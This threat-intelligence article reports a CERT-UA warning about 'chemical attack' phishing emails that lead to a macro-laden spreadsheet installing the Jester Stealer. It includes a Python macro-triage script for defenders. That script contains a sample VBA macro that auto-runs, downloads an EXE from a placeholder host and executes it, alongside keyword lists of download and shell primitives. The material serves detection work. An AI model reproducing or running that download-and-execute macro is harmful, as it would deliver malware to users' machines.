Weaponized Document to Deliver Jester Stealer

The Computer Emergency Response Team of Ukraine (CERT-UA) has recently issued a warning about the mass distribution of malicious emails targeting Ukrainian citizens.

The CERT-UA advisory says, “If you open the document and activate the macro, the latter will download and run the EXE file, which will soon damage the computer with the malicious program JesterStealer. It is noted that executable files are downloaded from compromised web resources”.

How the "Chemical Attack" Lure Is Carried Out

The emails have the subject line "chemical attack" and warn Ukrainians that information has been received indicating that chemical weapons will be used at 01:00, and that the authorities are not alerting the public to the threat so as not to cause panic.

The emails claim to provide information on where the chemical weapons will be used and the location of shelters where people will be safe. That information is provided in a document, a link to which is included in the email.

Upon clicking the link, the user is directed to an XLS spreadsheet hosted on a compromised website. The spreadsheet holds a malicious macro that runs once the document is opened and the content is enabled. The macro downloads an .EXE payload from a remote server and executes that file, which installs the Jester Stealer malware.
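The download-and-execute macro pattern described above is easy to triage once the VBA source has been extracted from a document (for example with the olevba tool from the oletools project). The following Python script is an added example for analysts and is not code from the original article or from CERT-UA; it scores extracted macro text for an auto-execution trigger combined with download and execution primitives, which is the shape the advisory describes. The two macro samples embedded in it are constructed for illustration, and the URL inside them uses a placeholder `.invalid` domain rather than any real indicator from the campaign.

```python
import re

# Constructed sample of a download-and-execute macro (not the real campaign's code).
# The URL is a placeholder; ".invalid" is reserved and never resolves.
SAMPLE_MACRO = """
Private Sub Workbook_Open()
    Dim url As String
    url = "http://example.invalid/placeholder/update.exe"
    Dim path As String
    path = Environ("TEMP") & "\\update.exe"
    URLDownloadToFile 0, url, path, 0, 0
    Shell path, vbHide
End Sub
"""

# Constructed benign macro used as a control.
BENIGN_MACRO = """
Sub FormatTotals()
    Range("A1:A10").NumberFormat = "0.00"
End Sub
"""

# Indicator groups: an auto-run trigger, a way to fetch a file, a way to run it.
AUTO_EXEC = [r"\bAuto_?Open\b", r"\bWorkbook_Open\b", r"\bDocument_Open\b", r"\bAutoExec\b"]
DOWNLOAD = [r"\bURLDownloadToFile\b", r"MSXML2\.XMLHTTP", r"WinHttp\.WinHttpRequest", r"\bADODB\.Stream\b"]
EXECUTE = [r"\bShell\b", r"WScript\.Shell", r"\bShellExecute\b", r"\bCreateProcess\w*\b"]
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)


def _hits(patterns, source):
    """Return the distinct indicator names from `patterns` that occur in `source`."""
    found = []
    for pat in patterns:
        m = re.search(pat, source, re.IGNORECASE)
        if m and m.group(0) not in found:
            found.append(m.group(0))
    return found


def triage_macro(source):
    """Classify extracted VBA source by the indicators it contains.

    Verdicts:
      "download-and-execute": auto-run trigger + download primitive + execution primitive
      "suspicious": download or execution primitive without the full chain
      "clean": none of the above
    """
    result = {
        "auto_exec": _hits(AUTO_EXEC, source),
        "download": _hits(DOWNLOAD, source),
        "execute": _hits(EXECUTE, source),
        "urls": URL_RE.findall(source),
        "exe_reference": bool(EXE_RE.search(source)),
    }
    if result["auto_exec"] and result["download"] and result["execute"]:
        result["verdict"] = "download-and-execute"
    elif result["download"] or result["execute"]:
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "clean"
    return result


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        r = triage_macro(src)
        print(f"{name}: {r['verdict']} auto_exec={r['auto_exec']} "
              f"download={r['download']} execute={r['execute']} urls={r['urls']}")
```

Keyword matching of this kind is a first-pass filter, not a verdict on its own: obfuscated macros split or encode these names, so a "clean" result on a document that arrived the way the article describes still warrants sandbox detonation. Any URL the script extracts should be treated as an indicator for blocking and log searches rather than something to visit.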

Jester Stealer Malware

This malware can steal and exfiltrate login credentials, cookies, crypto wallets, passwords stored in browsers, messages in email clients, IM chat data, and other information.

It also has anti-analysis features that detect when it is running in a sandbox or virtual machine, and it lacks a persistence mechanism: once its operations have been performed and the program is closed, it is removed from the system.

Macros in the attached document fetching the malware payload

It is unclear whether this is an attack by a pro-Russian hacking group or by a cybercriminal gang. Since Jester malware is widely available and is licensed at $99 per month or $249 for lifetime use, the campaign is unlikely to have been conducted by a nation-state threat actor.

Since the invasion of Ukraine, citizens have been highly vigilant and live with the fear of chemical weapon attacks, so there is a high probability that the emails will be opened. Regardless of the significance of the threat outlined in an email, it is essential to follow email security best practices and not to follow links or open attachments in unsolicited emails.
